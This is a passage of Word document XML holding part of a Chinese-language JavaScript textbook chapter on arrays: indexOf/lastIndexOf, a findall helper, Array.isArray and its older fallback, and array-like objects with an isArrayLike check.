        <w:t>1:a[1]</w:t>
      </w:r>
      <w:r>
        <w:t>是</w:t>
      </w:r>
      <w:r>
        <w:t>1</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>a.lastIndexOf(1)//=</w:t>
      </w:r>
      <w:r>
        <w:t>＞</w:t>
      </w:r>
      <w:r>
        <w:t>3:a[3]</w:t>
      </w:r>
      <w:r>
        <w:t>是</w:t>
      </w:r>
      <w:r>
        <w:t>1</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>a.indexOf(3)//=</w:t>
      </w:r>
      <w:r>
        <w:t>＞</w:t>
      </w:r>
      <w:r>
        <w:t>-1:</w:t>
      </w:r>
      <w:r>
        <w:t>没有值为</w:t>
      </w:r>
      <w:r>
        <w:t>3</w:t>
      </w:r>
      <w:r>
        <w:t>的元素</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>不同于本节描述的其他方法，</w:t>
      </w:r>
      <w:r>
        <w:t>indexOf()</w:t>
      </w:r>
      <w:r>
        <w:t>和</w:t>
      </w:r>
      <w:r>
        <w:t>lastIndexOf()</w:t>
      </w:r>
      <w:r>
        <w:t>方法不接收一个函数作为其参数。第一个参数是需要搜索的值，第二个参数是可选的：它指定数组中的一个索引，从那里开始搜索。如果省略该参数，</w:t>
      </w:r>
      <w:r>
        <w:t>indexOf()</w:t>
      </w:r>
      <w:r>
        <w:t>从头开始搜索，而</w:t>
      </w:r>
      <w:r>
        <w:t>lastIndexOf()</w:t>
      </w:r>
      <w:r>
        <w:t>从末尾开始搜索。第二个参数也可以是负数，它代表相对数组末尾的偏移量，对于</w:t>
      </w:r>
      <w:r>
        <w:t>splice()</w:t>
      </w:r>
      <w:r>
        <w:t>方法：例如，</w:t>
      </w:r>
      <w:r>
        <w:t>-1</w:t>
      </w:r>
      <w:r>
        <w:t>指定数组的最后一个元素。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>如</w:t>
      </w:r>
      <w:r>
        <w:t>下函数在一个数组中搜索指定的值并返回包含所有匹配的数组索引的一个数组。它展示了如何运用</w:t>
      </w:r>
      <w:r>
        <w:t>indexOf()</w:t>
      </w:r>
      <w:r>
        <w:t>的第二个参数来查找除了第一个以外匹配的值。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>//</w:t>
      </w:r>
      <w:r>
        <w:t>在数组中查找所有出现的</w:t>
      </w:r>
      <w:r>
        <w:t>x</w:t>
      </w:r>
      <w:r>
        <w:t>，并返回一个包含匹配索引的数组</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>function findall(a,x){</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>var results=[],//</w:t>
      </w:r>
      <w:r>
        <w:t>将会返回的数组</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>len=a.length,//</w:t>
      </w:r>
      <w:r>
        <w:t>待搜索数组的长度</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>pos=0;//</w:t>
      </w:r>
      <w:r>
        <w:t>开始搜索的位置</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>while(pos</w:t>
      </w:r>
      <w:r>
        <w:t>＜</w:t>
      </w:r>
      <w:r>
        <w:t>len){//</w:t>
      </w:r>
      <w:r>
        <w:t>循环搜索多个元素</w:t>
      </w:r>
      <w:r>
        <w:t>...</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>pos=a.indexOf(x,pos);//</w:t>
      </w:r>
      <w:r>
        <w:t>搜索</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>if(pos==</w:t>
      </w:r>
      <w:r>
        <w:t>=-1)break;//</w:t>
      </w:r>
      <w:r>
        <w:t>未找到，就完成搜索</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>results.push(pos);//</w:t>
      </w:r>
      <w:r>
        <w:t>否则，在数组中存储索引</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>pos=pos+1;//</w:t>
      </w:r>
      <w:r>
        <w:t>并从下一个位置开始搜索</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>return results;//</w:t>
      </w:r>
      <w:r>
        <w:t>返回包含索引的数组</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注意，字符串也有</w:t>
      </w:r>
      <w:r>
        <w:t>indexOf()</w:t>
      </w:r>
      <w:r>
        <w:t>和</w:t>
      </w:r>
      <w:r>
        <w:t>lastIndexOf()</w:t>
      </w:r>
      <w:r>
        <w:t>方法，它们和数组方法的功能类似。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:spacing w:before="240" w:after="240"/>
      </w:pPr>
      <w:bookmarkStart w:id="187" w:name="7_10_Shu_Zu_Lei_Xing_"/>
      <w:r>
        <w:t>7.10</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">　数组类型</w:t>
      </w:r>
      <w:bookmarkEnd w:id="187"/>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>我们在本章中到处都可以看见数组是具有特殊行为的对象。给定一个未知的对象，判定它是否为数组通常非常有用。在</w:t>
      </w:r>
      <w:r>
        <w:t>ECMAScript 5</w:t>
      </w:r>
      <w:r>
        <w:t>中，可以使用</w:t>
      </w:r>
      <w:r>
        <w:t>Array.isArray()</w:t>
      </w:r>
      <w:r>
        <w:t>函数来</w:t>
      </w:r>
      <w:r>
        <w:t>做这件事情：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>Array.isArray([])//=</w:t>
      </w:r>
      <w:r>
        <w:t>＞</w:t>
      </w:r>
      <w:r>
        <w:t>true</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>Array.isArray({})//=</w:t>
      </w:r>
      <w:r>
        <w:t>＞</w:t>
      </w:r>
      <w:r>
        <w:t>false</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>但是，在</w:t>
      </w:r>
      <w:r>
        <w:t>ECMAScript 5</w:t>
      </w:r>
      <w:r>
        <w:t>以前，要区分数组和非数组对象却令人惊讶地困难。</w:t>
      </w:r>
      <w:r>
        <w:t>typeof</w:t>
      </w:r>
      <w:r>
        <w:t>操作符在这里帮不上忙：对数组它返回</w:t>
      </w:r>
      <w:r>
        <w:t>“</w:t>
      </w:r>
      <w:r>
        <w:t>对象</w:t>
      </w:r>
      <w:r>
        <w:t>”</w:t>
      </w:r>
      <w:r>
        <w:t>（并且对于除了函数以外的所有对象都是如此）。</w:t>
      </w:r>
      <w:r>
        <w:t>instanceof</w:t>
      </w:r>
      <w:r>
        <w:t>操作符只能用于简单的情形：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>[]instanceof Array//=</w:t>
      </w:r>
      <w:r>
        <w:t>＞</w:t>
      </w:r>
      <w:r>
        <w:t>true</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>({})instanceof Array//=</w:t>
      </w:r>
      <w:r>
        <w:t>＞</w:t>
      </w:r>
      <w:r>
        <w:t>false</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>使用</w:t>
      </w:r>
      <w:r>
        <w:t>instanceof</w:t>
      </w:r>
      <w:r>
        <w:t>的问题是在</w:t>
      </w:r>
      <w:r>
        <w:t>Web</w:t>
      </w:r>
      <w:r>
        <w:t>浏览器中有可能有多个窗口或窗体（</w:t>
      </w:r>
      <w:r>
        <w:t>frame</w:t>
      </w:r>
      <w:r>
        <w:t>）存在。每个窗口都有自己的</w:t>
      </w:r>
      <w:r>
        <w:t>JavaScript</w:t>
      </w:r>
      <w:r>
        <w:t>环境，有自</w:t>
      </w:r>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>己的全局对象。并且，每个全局对象有自己的一组构造函数。因此一个窗体中的对象将不可能是另外窗体中的构造函数的实例。窗体之间的混淆不常发生，但这个问题足已证明</w:t>
      </w:r>
      <w:r>
        <w:t>instanceof</w:t>
      </w:r>
      <w:r>
        <w:t>操作符不能视为一个可靠的数组检测方法。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>解决方案是检查对象的类属性（见</w:t>
      </w:r>
      <w:r>
        <w:t>6.8.2</w:t>
      </w:r>
      <w:r>
        <w:t>节）。对数组而言该属性的值总是</w:t>
      </w:r>
      <w:r>
        <w:t>"Array"</w:t>
      </w:r>
      <w:r>
        <w:t>，因此在</w:t>
      </w:r>
      <w:r>
        <w:t>ECMAScript 3</w:t>
      </w:r>
      <w:r>
        <w:t>中</w:t>
      </w:r>
      <w:r>
        <w:t>isArray()</w:t>
      </w:r>
      <w:r>
        <w:t>函数的代码可以这样书写：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>var isArray=Function.isArray||function(o){</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>return typeof o==="object"</w:t>
      </w:r>
      <w:r>
        <w:t>＆＆</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>Object.prototype.toString.call(o)==="[object Array]";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实际上，此处类属性的检测就是</w:t>
      </w:r>
      <w:r>
        <w:t>ECMAScript 5</w:t>
      </w:r>
      <w:r>
        <w:t>中</w:t>
      </w:r>
      <w:r>
        <w:t>Array.isArray()</w:t>
      </w:r>
      <w:r>
        <w:t>函数所做的事情。获得对象类属性的技术使用了</w:t>
      </w:r>
      <w:r>
        <w:t>6.8.2</w:t>
      </w:r>
      <w:r>
        <w:t>节和例</w:t>
      </w:r>
      <w:r>
        <w:t>6-4</w:t>
      </w:r>
      <w:r>
        <w:t>中展示的</w:t>
      </w:r>
      <w:r>
        <w:t>Object.prototype.toString()</w:t>
      </w:r>
      <w:r>
        <w:t>方法。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:spacing w:before="240" w:after="240"/>
      </w:pPr>
      <w:bookmarkStart w:id="188" w:name="7_11_Lei_Shu_Zu_Dui_Xiang_"/>
      <w:r>
        <w:t>7.11</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">　类数组对象</w:t>
      </w:r>
      <w:bookmarkEnd w:id="188"/>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>我们已经看到，</w:t>
      </w:r>
      <w:r>
        <w:t>JavaScript</w:t>
      </w:r>
      <w:r>
        <w:t>数组的有一些特性是其他对象所没有的：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>·</w:t>
      </w:r>
      <w:r>
        <w:t>当有新的元素添加到列表中时，自动更新</w:t>
      </w:r>
      <w:r>
        <w:t>length</w:t>
      </w:r>
      <w:r>
        <w:t>属性。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>·</w:t>
      </w:r>
      <w:r>
        <w:t>设置</w:t>
      </w:r>
      <w:r>
        <w:t>length</w:t>
      </w:r>
      <w:r>
        <w:t>为一个较小值将截断数组。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>·</w:t>
      </w:r>
      <w:r>
        <w:t>从</w:t>
      </w:r>
      <w:r>
        <w:t>Array.prototype</w:t>
      </w:r>
      <w:r>
        <w:t>中继承一些有用的方法。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>·</w:t>
      </w:r>
      <w:r>
        <w:t>其类属性为</w:t>
      </w:r>
      <w:r>
        <w:t>"Array"</w:t>
      </w:r>
      <w:r>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>这些特性让</w:t>
      </w:r>
      <w:r>
        <w:t>JavaScript</w:t>
      </w:r>
      <w:r>
        <w:t>数组和常规的对象有明显的区别。但是它们不是定义数组的本质特性。一种常常完全合理的看法把拥有一个数值</w:t>
      </w:r>
      <w:r>
        <w:t>length</w:t>
      </w:r>
      <w:r>
        <w:t>属性和对应非负整数属性的对象看做一种类型的数组。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>实践中这些</w:t>
      </w:r>
      <w:r>
        <w:t>“</w:t>
      </w:r>
      <w:r>
        <w:t>类数组</w:t>
      </w:r>
      <w:r>
        <w:t>”</w:t>
      </w:r>
      <w:r>
        <w:t>对象实际上偶尔出现，虽然不能在它们之上直</w:t>
      </w:r>
      <w:r>
        <w:t>接调用数组方法或者期望</w:t>
      </w:r>
      <w:r>
        <w:t>length</w:t>
      </w:r>
      <w:r>
        <w:t>属性有什么特殊的行为，但是仍然可以用针对真正数组遍历的代码来遍历它们。结论就是很多数组算法针对类数组对象工作得很好，就像针对真正的数组一样。如果算法把数组看成只读的或者如果它们至少保持数组长度不变，也尤其是这种情况。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>以下代码为一个常规对象增加了一些属性使其变成类数组对象，然后遍历生成的伪数组的</w:t>
      </w:r>
      <w:r>
        <w:t>“</w:t>
      </w:r>
      <w:r>
        <w:t>元素</w:t>
      </w:r>
      <w:r>
        <w:t>”</w:t>
      </w:r>
      <w:r>
        <w:t>：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>var a={};//</w:t>
      </w:r>
      <w:r>
        <w:t>从一个常规空对象开始</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>//</w:t>
      </w:r>
      <w:r>
        <w:t>添加一些属性，称为</w:t>
      </w:r>
      <w:r>
        <w:t>"</w:t>
      </w:r>
      <w:r>
        <w:t>类数组</w:t>
      </w:r>
      <w:r>
        <w:t>"</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>var i=0;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>while(i</w:t>
      </w:r>
      <w:r>
        <w:t>＜</w:t>
      </w:r>
      <w:r>
        <w:t>10){</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>a[i]=i*i;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>i++;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>a.length=i;//</w:t>
      </w:r>
      <w:r>
        <w:t>现在，当做真正的数组遍历它</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>var total=0;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>for(var j=0;j</w:t>
      </w:r>
      <w:r>
        <w:t>＜</w:t>
      </w:r>
      <w:r>
        <w:t>a.length;j++)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>total+=a[j];</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>8.3.2</w:t>
      </w:r>
      <w:r>
        <w:t>节描述的</w:t>
      </w:r>
      <w:r>
        <w:t>Arguments</w:t>
      </w:r>
      <w:r>
        <w:t>对象就是一个类数组对象。在客户端</w:t>
      </w:r>
      <w:r>
        <w:t>JavaScript</w:t>
      </w:r>
      <w:r>
        <w:t>中，一些</w:t>
      </w:r>
      <w:r>
        <w:t>DOM</w:t>
      </w:r>
      <w:r>
        <w:t>方法（如</w:t>
      </w:r>
      <w:r>
        <w:t>document.getElementsByTagName()</w:t>
      </w:r>
      <w:r>
        <w:t>）也返回类数组对象。下面有一个函数可以用来检测类数组对象：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>//</w:t>
      </w:r>
      <w:r>
        <w:t>判定</w:t>
      </w:r>
      <w:r>
        <w:t>o</w:t>
      </w:r>
      <w:r>
        <w:t>是否是一个类数组对象</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>//</w:t>
      </w:r>
      <w:r>
        <w:t>字符串和函数有</w:t>
      </w:r>
      <w:r>
        <w:t>length</w:t>
      </w:r>
      <w:r>
        <w:t>属性，但是它们</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>//</w:t>
      </w:r>
      <w:r>
        <w:t>可以用</w:t>
      </w:r>
      <w:r>
        <w:t>typeof</w:t>
      </w:r>
      <w:r>
        <w:t>检测将其排除。</w:t>
      </w:r>
      <w:r>
        <w:t>在客户端</w:t>
      </w:r>
      <w:r>
        <w:t>JavaScript</w:t>
      </w:r>
      <w:r>
        <w:t>中，</w:t>
      </w:r>
      <w:r>
        <w:t>DOM</w:t>
      </w:r>
      <w:r>
        <w:t>文本节点</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>//</w:t>
      </w:r>
      <w:r>
        <w:t>也有</w:t>
      </w:r>
      <w:r>
        <w:t>length</w:t>
      </w:r>
      <w:r>
        <w:t>属性，需要用额外判断</w:t>
      </w:r>
      <w:r>
        <w:t>o.nodeType!=3</w:t>
      </w:r>
      <w:r>
        <w:t>将其排除</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>function isArrayLike(o){</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>if(o</w:t>
      </w:r>
      <w:r>
        <w:t>＆＆</w:t>
      </w:r>
      <w:r>
        <w:t>//o</w:t>
      </w:r>
      <w:r>
        <w:t>非</w:t>
      </w:r>
      <w:r>
        <w:t>null</w:t>
      </w:r>
      <w:r>
        <w:t>、</w:t>
      </w:r>
      <w:r>
        <w:t>undefined</w:t>
      </w:r>
      <w:r>
        <w:t>等</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>typeof o==="object"</w:t>
      </w:r>
      <w:r>
        <w:t>＆＆</w:t>
      </w:r>
      <w:r>
        <w:t>//o</w:t>
      </w:r>
      <w:r>
        <w:t>是对象</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>isFinite(o.length)</w:t>
      </w:r>
      <w:r>
        <w:t>＆＆</w:t>
      </w:r>
      <w:r>
        <w:t>//o.length</w:t>
      </w:r>
      <w:r>
        <w:t>是有限数值</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>o.length</w:t>
      </w:r>
      <w:r>
        <w:t>＞</w:t>
      </w:r>
      <w:r>
        <w:t>=0</w:t>
      </w:r>
      <w:r>
        <w:t>＆＆</w:t>
      </w:r>
      <w:r>
        <w:t>//o.length</w:t>
      </w:r>
      <w:r>
        <w:t>为非负值</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>o.length===Math.floor(o.length)</w:t>
      </w:r>
      <w:r>
        <w:t>＆＆</w:t>
      </w:r>
      <w:r>
        <w:t>//o.length</w:t>
      </w:r>
      <w:r>
        <w:t>是整数</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>o.le</w:t>
      </w:r>
      <w:r>
        <w:t>ngth</w:t>
      </w:r>
      <w:r>
        <w:t>＜</w:t>
      </w:r>
      <w:r>
        <w:t>4294967296)//o.length</w:t>
      </w:r>
      <w:r>
        <w:t>＜</w:t>
      </w:r>
      <w:r>
        <w:t>2^32</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
